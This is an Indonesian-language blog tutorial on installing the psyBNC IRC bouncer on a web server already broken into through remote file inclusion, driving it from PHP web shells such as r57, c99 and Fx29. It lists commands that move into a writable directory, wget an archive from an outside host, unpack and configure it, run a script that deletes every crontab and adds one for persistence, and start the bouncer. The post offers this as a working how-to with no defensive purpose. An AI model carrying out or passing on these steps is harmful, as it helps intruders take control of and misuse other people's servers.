Jumat, 19 Maret 2010

Tutor membuat PsyBnc Injekan

mungkin anda mendapatkan target RFI dengan SAFE MODE OFF. Kenapa yg OFF? Karena fungsi-fungsi system, exec, passhthru, dan popen untuk mengeksekusi perintah shell ini aktif secara default. Nah, bagaimana cara Anda mengeksekusi perintah tsb? Yaitu dengan menggunakan injector seperti r57, c99, atau Fx29. Disana kita akan menemukan input box untuk mengetikkan perintah2 shell, biasanya berlabel “Command”, “Run Command”, “Execute Command”, atau semacam itu. Baiklah.. Langsung aja ya..

Pertama kita harus berada di direktori yg full permission, ewh.. Apa itu full permission? Yaitu direktori/folder yg mengizinkan kita utk menulis/meletakkan file didalamnya. Masih bingung? Ya udah, kita langsung aja coba direktori yg biasanya full perm/writable diantaranya /var/tmp/, /var/spool/samba/.

Disini kita menggunakan injector Fx29Sh, untuk pindah ke direktori /var/tmp/ kita tinggal mengetikkannya di input box berlabel “Directory” dan klik tombol “GO”. Skr kita udah berada di direktori /var/tmp/, lalu ketikkan perintah2 dibawah ini di Input yg berlabel “Command”.

1. wget http://channels.dal.net/nama/psy.tar.gz
2. tar -zvxf psy.tar.gz

3. cd .psy

4. ./config

contoh: ./config ANASKI 1990
ident = ANASKI
port = 1990

5. ./fuck
perintah ini akan menghapus semua crontab dan membuat crontab baru untuk psyBNC, hati-hatilah menggunakannya

6. ./run
perintah ini akan menjalankan psyBNC, set ident di mIRC sesuai diatas lalu koneklah melalui port yg telah di set pada langkah 4 diatas.

Jika muncul baris dengan pesan “Listening on port 1991?, berarti psyBNC-nya udah jalan. Kemudian kita tes koneksinya di mIRC dengan mengetikkan:

/server
Contoh: /server 127.0.0.1 ANASKI

Jika berhasil, akan muncul pesan “Welcome to psyBNC” di mIRC eloe dan ingat.. Ident/username yg pertama konek adalah admin psyBNC tsb dan password untuk konek ke psyBNC td adalah “passgue”. Untuk konek ke IRC, ketik /addserver irc.cbn.net.id:6667 dan tunggulah sampai psyBNC kita terhubung ke server IRC.

3 komentar: